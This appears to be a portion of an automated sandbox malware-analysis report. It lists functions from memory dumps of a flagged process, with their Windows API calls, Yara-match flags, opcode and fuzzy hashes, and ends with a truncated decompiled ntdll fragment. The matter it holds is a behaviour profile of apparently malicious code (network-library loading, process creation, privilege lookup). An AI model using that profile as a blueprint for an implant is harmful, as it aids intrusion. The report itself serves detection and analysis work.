NtClose.NTDLL(02A23D40,?,?,02A23D40,00000000,FFFFFFFF), ref: 02A28325

Memory Dump Source

Source File: 0000000A.00000002.487516890.0000000002A10000.00000040.00000001.sdmp, Offset: 02A10000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 5eac75893b4e04f5b055c6b4cb28eb4c2d7cacbfce8f60ef2a0ccdd74db64d81
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: AED012762403146BD710EF98CC45E97775DEF44750F154455BA185B241C570F90486E0

Uniqueness

Uniqueness Score: -1.00%

Function 043F9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043F986A

Memory Dump Source

Source File: 0000000A.00000002.487880611.0000000004390000.00000040.00000001.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000A.00000002.488104702.00000000044AB000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.488115015.00000000044AF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7c77495f8e1f5a6f8a3181dc2d4e4d54e89900b03716fc12701cfb4efa663412
Instruction ID: 94ca18ddaab8ee8b1ca910fad39ecc4e6222560d86885467f7c4ba81dd0d91d1
Opcode Fuzzy Hash: 7c77495f8e1f5a6f8a3181dc2d4e4d54e89900b03716fc12701cfb4efa663412
Instruction Fuzzy Hash: 609002B160500413F51161994504707000997D0285F91C423A041555CD97EAD966B161

Uniqueness

Uniqueness Score: -1.00%

Function 043F9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043F984A

Memory Dump Source

Source File: 0000000A.00000002.487880611.0000000004390000.00000040.00000001.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000A.00000002.488104702.00000000044AB000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.488115015.00000000044AF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 17945362426ab3eef5406002129505eee94c7fda06ea0175392e31e557632107
Instruction ID: efdfe949daab5d8781c6a3c5afa6b5760030a9193c1d1ea5f2511b98390d4146
Opcode Fuzzy Hash: 17945362426ab3eef5406002129505eee94c7fda06ea0175392e31e557632107
Instruction Fuzzy Hash: 6A9002A1646041527945B19944045074006A7E0285791C023A1405954C86BAE86AE661

Uniqueness

Uniqueness Score: -1.00%

Function 043F9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043F991A

Memory Dump Source

Source File: 0000000A.00000002.487880611.0000000004390000.00000040.00000001.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000A.00000002.488104702.00000000044AB000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.488115015.00000000044AF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 282a83f3ffe0c1db7a5d0d21523d612ff4e1dfde09a3da7b26ce1bb3f8a0ebd8
Instruction ID: 408515c13096a5817d6cd0b3ce2f43627ab4ad2cfae7fc311ad320ea48c09d07
Opcode Fuzzy Hash: 282a83f3ffe0c1db7a5d0d21523d612ff4e1dfde09a3da7b26ce1bb3f8a0ebd8
Instruction Fuzzy Hash: D59002F160500402F54071994404746000597D0345F51C022A5055558E87EDDDE976A5

Uniqueness

Uniqueness Score: -1.00%

Function 043F9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043F954A

Memory Dump Source

Source File: 0000000A.00000002.487880611.0000000004390000.00000040.00000001.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000A.00000002.488104702.00000000044AB000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.488115015.00000000044AF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6b984c8bf8ff7d07be46b5f26acf445f61057baecf6f22300c04a1928bdeafdf
Instruction ID: a5192dc5712a99896883af9b2041574835c9908b5a49e6ec30f24e40b0eaef82
Opcode Fuzzy Hash: 6b984c8bf8ff7d07be46b5f26acf445f61057baecf6f22300c04a1928bdeafdf
Instruction Fuzzy Hash: 739002A5615000032505A5990704507004697D5395351C032F1006554CD7B5D8756161

Uniqueness

Uniqueness Score: -1.00%

Function 043F99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043F99AA

Memory Dump Source

Source File: 0000000A.00000002.487880611.0000000004390000.00000040.00000001.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000A.00000002.488104702.00000000044AB000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.488115015.00000000044AF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: de24222673a568d031b7cd481d9727d939fd94701bf2fa3b44d75c3b1ef7987a
Instruction ID: b62b521ff1143be3181408a48201cdbe37717c795b7a972c30e773897340488c
Opcode Fuzzy Hash: de24222673a568d031b7cd481d9727d939fd94701bf2fa3b44d75c3b1ef7987a
Instruction Fuzzy Hash: A29002E174500442F50061994414B060005D7E1345F51C026E1055558D87ADDC667166

Uniqueness

Uniqueness Score: -1.00%

Function 043F95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043F95DA

Memory Dump Source

Source File: 0000000A.00000002.487880611.0000000004390000.00000040.00000001.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000A.00000002.488104702.00000000044AB000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.488115015.00000000044AF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 834530a6d39d6a106276dea48b55431c44d79a187a60b8fbdc988dc49f3c405d
Instruction ID: 13b6ae4a2a33989b86543f5961975cf5b334d6a344a34d5a93c0994f85521a33
Opcode Fuzzy Hash: 834530a6d39d6a106276dea48b55431c44d79a187a60b8fbdc988dc49f3c405d
Instruction Fuzzy Hash: C69002E160600003650571994414616400A97E0245B51C032E1005594DC6B9D8A57165

Uniqueness

Uniqueness Score: -1.00%

Function 043F9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043F966A

Memory Dump Source

Source File: 0000000A.00000002.487880611.0000000004390000.00000040.00000001.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000A.00000002.488104702.00000000044AB000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.488115015.00000000044AF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0f584209e67d909ea83504ee80e36abd830d83cbdc7ecd0bad9ac5901dae97c5
Instruction ID: e6f8430adaad0d5c2cc231533b5580634d7220adad32d7d7d7cbe82ae05f7902
Opcode Fuzzy Hash: 0f584209e67d909ea83504ee80e36abd830d83cbdc7ecd0bad9ac5901dae97c5
Instruction Fuzzy Hash: C69002B160500802F5807199440464A000597D1345F91C026A0016658DCBA9DA6D77E1

Uniqueness

Uniqueness Score: -1.00%

Function 043F9650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043F965A

Memory Dump Source

Source File: 0000000A.00000002.487880611.0000000004390000.00000040.00000001.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000A.00000002.488104702.00000000044AB000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.488115015.00000000044AF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1d35c939c0ba3baedcd37189165b44ca43aa6e7111edfdef34df4be5b3a95d58
Instruction ID: 9d7daa0ea5e1ba3e30f066b640254bc3212d7e9ad24580601e0dedcd2d153764
Opcode Fuzzy Hash: 1d35c939c0ba3baedcd37189165b44ca43aa6e7111edfdef34df4be5b3a95d58
Instruction Fuzzy Hash: D69002B160904842F54071994404A46001597D0349F51C022A0055698D97B9DD69B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 043F9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043F9A5A

Memory Dump Source

Source File: 0000000A.00000002.487880611.0000000004390000.00000040.00000001.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000A.00000002.488104702.00000000044AB000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.488115015.00000000044AF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b643e4446a4028602e83051b1094097b41563ba14c01f5d4fb5030a84e31875b
Instruction ID: f2bba6ad28203b3690176c92f91f63275b1390699fdb17e983dd9cb1316e1381
Opcode Fuzzy Hash: b643e4446a4028602e83051b1094097b41563ba14c01f5d4fb5030a84e31875b
Instruction Fuzzy Hash: 0A9002A161580042F60065A94C14B07000597D0347F51C126A0145558CCAA9D8756561

Uniqueness

Uniqueness Score: -1.00%

Function 043F96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043F96EA

Memory Dump Source

Source File: 0000000A.00000002.487880611.0000000004390000.00000040.00000001.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000A.00000002.488104702.00000000044AB000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.488115015.00000000044AF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8690ef49d74c679bbbd95223289246bfe21cd8662cfb49e26bf5ee1e1fcadb7c
Instruction ID: 76a0d980d38b13752a28c0000f4774d0c21c475bd9811deb1401c6eb23e4b4f1
Opcode Fuzzy Hash: 8690ef49d74c679bbbd95223289246bfe21cd8662cfb49e26bf5ee1e1fcadb7c
Instruction Fuzzy Hash: C99002B160508802F5106199840474A000597D0345F55C422A441565CD87E9D8A57161

Uniqueness

Uniqueness Score: -1.00%

Function 043F96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043F96DA

Memory Dump Source

Source File: 0000000A.00000002.487880611.0000000004390000.00000040.00000001.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000A.00000002.488104702.00000000044AB000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.488115015.00000000044AF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f1457685351405289b219dc86ee06b3e160cf6fcef46b9952859d276267979ef
Instruction ID: e008c8f47e0d7157fdad1eaac649cbde1163616c788fc30f7e55190bf91fb0b6
Opcode Fuzzy Hash: f1457685351405289b219dc86ee06b3e160cf6fcef46b9952859d276267979ef
Instruction Fuzzy Hash: 0E9002B160500842F50061994404B46000597E0345F51C027A0115658D87A9D8657561

Uniqueness

Uniqueness Score: -1.00%

Function 043F9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043F971A

Memory Dump Source

Source File: 0000000A.00000002.487880611.0000000004390000.00000040.00000001.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000A.00000002.488104702.00000000044AB000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.488115015.00000000044AF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: aa239f480452c65f081246f2a9ce88a261c7d277aa5a3e0af7108930268bb491
Instruction ID: c9392f048f5a5117ab94bc10e03478ef40e17471964fbc0703d720312d2718e3
Opcode Fuzzy Hash: aa239f480452c65f081246f2a9ce88a261c7d277aa5a3e0af7108930268bb491
Instruction Fuzzy Hash: 3F9002B160500402F50065D95408646000597E0345F51D022A5015559EC7F9D8A57171

Uniqueness

Uniqueness Score: -1.00%

Function 043F9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043F978A

Memory Dump Source

Source File: 0000000A.00000002.487880611.0000000004390000.00000040.00000001.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000A.00000002.488104702.00000000044AB000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.488115015.00000000044AF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ed565a36f85c6590caa6d3a2c2a0f675a0b349b37a763bf433999e9b04623634
Instruction ID: bddbed22b22af11a27c46bc45568ec39088e709bc3aecd02904af45cf9810ed8
Opcode Fuzzy Hash: ed565a36f85c6590caa6d3a2c2a0f675a0b349b37a763bf433999e9b04623634
Instruction Fuzzy Hash: 289002A961700002F5807199540860A000597D1246F91D426A000655CCCAA9D87D6361

Uniqueness

Uniqueness Score: -1.00%

Function 043F9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043F9FEA

Memory Dump Source

Source File: 0000000A.00000002.487880611.0000000004390000.00000040.00000001.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000A.00000002.488104702.00000000044AB000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.488115015.00000000044AF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4e8daa75d2116464c417b86f406a3ae6e8023dc808e7764069e7b49de0838b8a
Instruction ID: d8c21635313e8ad7cf4c66121ee79c722df863f5c51ea485243d76fb36438c7f
Opcode Fuzzy Hash: 4e8daa75d2116464c417b86f406a3ae6e8023dc808e7764069e7b49de0838b8a
Instruction Fuzzy Hash: 929002B171514402F51061998404706000597D1245F51C422A081555CD87E9D8A57162

Uniqueness

Uniqueness Score: -1.00%

Function 02A26EF0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 02A26F98

Strings

net.dll, xrefs: 02A26F61, 02A26FE7, 02A26FBF, 02A26FCB, 02A26FF3
wininet.dll, xrefs: 02A26F4E, 02A26F57

Memory Dump Source

Source File: 0000000A.00000002.487516890.0000000002A10000.00000040.00000001.sdmp, Offset: 02A10000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 03d41cf3a13b2fb4802584e5cc4aa97dff399ad698c1439f5adf2832003c1629
Instruction ID: 88a092d0f61932d6f5d2a7efb1304d84b22647435e268d783ad79433897c665a
Opcode Fuzzy Hash: 03d41cf3a13b2fb4802584e5cc4aa97dff399ad698c1439f5adf2832003c1629
Instruction Fuzzy Hash: 99316FB5642714ABC711DF68C9A0FA7B7F9AB48700F00851DF61A6B240DB70B549CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 02A26EE6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 02A26F98

Strings

net.dll, xrefs: 02A26F61, 02A26FBF, 02A26FCB
wininet.dll, xrefs: 02A26F4E, 02A26F57

Memory Dump Source

Source File: 0000000A.00000002.487516890.0000000002A10000.00000040.00000001.sdmp, Offset: 02A10000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 6b7617ac0ee6e22add5dfebb65a5511c282918e9772ae2f9ecbebc3b78e4506b
Instruction ID: b826668157a7237dc31ea68c893231cf91fba3c31d5a83872ec95854ca04478a
Opcode Fuzzy Hash: 6b7617ac0ee6e22add5dfebb65a5511c282918e9772ae2f9ecbebc3b78e4506b
Instruction Fuzzy Hash: B721BFB1642315AFD711DF68C8A1FABB7F9BB48700F04802DF61A6B240D770A549CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 02A284E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02A13B93), ref: 02A2850D

Strings

.z`, xrefs: 02A284FC, 02A28508

Memory Dump Source

Source File: 0000000A.00000002.487516890.0000000002A10000.00000040.00000001.sdmp, Offset: 02A10000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 8e61060d6fdbc1c9087c3936a1eff52a6eb9f329c649c9c9128d7eb0344e9519
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 6AE012B2200218ABDB18EF99CC48EA777ADEF88750F018558BA085B241CA30E9148AB0

Uniqueness

Uniqueness Score: -1.00%

Function 02A284D4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02A13B93), ref: 02A2850D

Strings

.z`, xrefs: 02A284FC, 02A28508

Memory Dump Source

Source File: 0000000A.00000002.487516890.0000000002A10000.00000040.00000001.sdmp, Offset: 02A10000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: e641709b8896f5aac4485ac3c5df57708f99eaa19733368f4537f06727c84e07
Instruction ID: d7478b45ede88a3482e15b6c89d5de3744d44c8fabf0f3a9fbc820d5f94bd828
Opcode Fuzzy Hash: e641709b8896f5aac4485ac3c5df57708f99eaa19733368f4537f06727c84e07
Instruction Fuzzy Hash: C5E068AC2442840BDB00EE28E4908A73785FF843147108909EC8983307C034C80A8BB1

Uniqueness

Uniqueness Score: -1.00%

Function 02A17270, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02A172CA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02A172EB

Memory Dump Source

Source File: 0000000A.00000002.487516890.0000000002A10000.00000040.00000001.sdmp, Offset: 02A10000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 49ab76c00c9184220b9dbad1f4bc5ba5386cd827cddda64d51339b7d16c96ff1
Instruction ID: 3ed0b9d8ad32f2d7b83723e9a4fd6fdaf1a6f255a58583023c353b355081ea04
Opcode Fuzzy Hash: 49ab76c00c9184220b9dbad1f4bc5ba5386cd827cddda64d51339b7d16c96ff1
Instruction Fuzzy Hash: 2701A731A8022977E724A6948D42FFFB76D9B04F51F150114FF04BA1C1EF946A0A8AF5

Uniqueness

Uniqueness Score: -1.00%

Function 02A19B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02A19BA2

Memory Dump Source

Source File: 0000000A.00000002.487516890.0000000002A10000.00000040.00000001.sdmp, Offset: 02A10000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: fd0720f4f9e6a4e16c84c73612c1b3959e4e1f0f179daef74289f94bc92627c7
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: 180171B6D4020EABDF10EBE4DD81FDEB3799B44308F004195EA0897281FA31EB08CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02A28675, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02A1CFB2,02A1CFB2,?,00000000,?,?), ref: 02A28670

Memory Dump Source

Source File: 0000000A.00000002.487516890.0000000002A10000.00000040.00000001.sdmp, Offset: 02A10000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: b95dca177bc3e0b334d8870d58869377c2e54386ebba5061efa66b41deb5e64a
Instruction ID: 92b24af357fc0582b770701a7f906a9887ce354f0bebc5c85f976d339adb3888
Opcode Fuzzy Hash: b95dca177bc3e0b334d8870d58869377c2e54386ebba5061efa66b41deb5e64a
Instruction Fuzzy Hash: CC01A2B22042546FDB24DF68CC88EEB7B68EF84310F144599FD8D57241C930E815CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 02A2854E, Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02A285A4

Memory Dump Source

Source File: 0000000A.00000002.487516890.0000000002A10000.00000040.00000001.sdmp, Offset: 02A10000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 8967850bb2fc1f34c19b83c00b9e08fe12e6c6e2fedc569ce408f917b69c990d
Instruction ID: 44d08068f42c5f32d0f2f851c9578784a78d29e8b4e109457ebc3327b3c57496
Opcode Fuzzy Hash: 8967850bb2fc1f34c19b83c00b9e08fe12e6c6e2fedc569ce408f917b69c990d
Instruction Fuzzy Hash: DD019DB2210208AFCB54DF89DC80EEB77ADAF8C754F158258FA0D97240C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 02A28550, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02A285A4

Memory Dump Source

Source File: 0000000A.00000002.487516890.0000000002A10000.00000040.00000001.sdmp, Offset: 02A10000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 256cf89089946805096e59661ee040098a673edad358cc9318f84835e15613c0
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: D801AFB2210208AFCB54DF89DC80EEB77ADAF8C754F158258BA0D97240C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02A27020, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02A1CCE0,?,?), ref: 02A2705C

Memory Dump Source

Source File: 0000000A.00000002.487516890.0000000002A10000.00000040.00000001.sdmp, Offset: 02A10000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 4b74d86bfe42af7d5fcb5c346ac09a19e00ed37dcbf51293ece7a7ca142cbe85
Instruction ID: 922a938fb0c32dc654267204c1bc14076ad6333b531428a797274de4d0e3d514
Opcode Fuzzy Hash: 4b74d86bfe42af7d5fcb5c346ac09a19e00ed37dcbf51293ece7a7ca142cbe85
Instruction Fuzzy Hash: FAE06D333802243AE630659DAC02FA7B29D8B85B20F140026FB0DEA2C1D995F80946A5

Uniqueness

Uniqueness Score: -1.00%

Function 02A28640, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02A1CFB2,02A1CFB2,?,00000000,?,?), ref: 02A28670

Memory Dump Source

Source File: 0000000A.00000002.487516890.0000000002A10000.00000040.00000001.sdmp, Offset: 02A10000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: fc355a8c09c4ae81b3011b187462ea6d5e6624248bc1b7e2c332661823d171cb
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 65E01AB12002186BDB10DF49CC84EE737ADEF88650F018154BA0857241C934E8148BF5

Uniqueness

Uniqueness Score: -1.00%

Function 02A284A0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(02A23526,?,02A23C9F,02A23C9F,?,02A23526,?,?,?,?,?,00000000,00000000,?), ref: 02A284CD

Memory Dump Source

Source File: 0000000A.00000002.487516890.0000000002A10000.00000040.00000001.sdmp, Offset: 02A10000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 89b87234d00d4d453783f9c5aa4975060cc4a4a6d9c72cd8fbc0f01506aabf93
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 3FE012B2200218ABDB14EF99CC40EA777ADEF88650F118558BA085B241CA30F9148AB0

Uniqueness

Uniqueness Score: -1.00%

Function 02A28642, Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02A1CFB2,02A1CFB2,?,00000000,?,?), ref: 02A28670

Memory Dump Source

Source File: 0000000A.00000002.487516890.0000000002A10000.00000040.00000001.sdmp, Offset: 02A10000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: b86ce0f69160b41f642dc728448cc3b703696c3d4e65d99745e67c76f72a3c12
Instruction ID: 88a2bd6ee68e10fa68c32a9dc3f82db9f4905ab6ba07dc0f90061f5a33a8896e
Opcode Fuzzy Hash: b86ce0f69160b41f642dc728448cc3b703696c3d4e65d99745e67c76f72a3c12
Instruction Fuzzy Hash: A6E04FB12002146FDB10DF58CC84EE73769EF88350F018154F90C97241C935E8158BB0

Uniqueness

Uniqueness Score: -1.00%

Function 02A1D420, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,02A17C73,?), ref: 02A1D44B

Memory Dump Source

Source File: 0000000A.00000002.487516890.0000000002A10000.00000040.00000001.sdmp, Offset: 02A10000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction ID: a9ccbbbd09ab977b5aede8cba80e5ad539558c4ef8a085c47c1db22f5e9fc63b
Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction Fuzzy Hash: A7D0A7717903043BEA10FBA89C03F2672CD5B45B14F494074FA49D73C3DE54F4004561

Uniqueness

Uniqueness Score: -1.00%

Function 043F967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043F9694

Memory Dump Source

Source File: 0000000A.00000002.487880611.0000000004390000.00000040.00000001.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000A.00000002.488104702.00000000044AB000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.488115015.00000000044AF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 174a3f3ebdbcf96bf531351b0a90e92c1290ca27b3619adebac03087bc2cc238
Instruction ID: 8a7f7ec2597773988bbe09289f35565752424febe070cf57f7f1d961459fdb2f
Opcode Fuzzy Hash: 174a3f3ebdbcf96bf531351b0a90e92c1290ca27b3619adebac03087bc2cc238
Instruction Fuzzy Hash: F5B09BF1D054C5C5FB11D7A14B087177A007FD0755F16C062D2020645A477CD095F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0444FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0444FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E043FCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04445720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
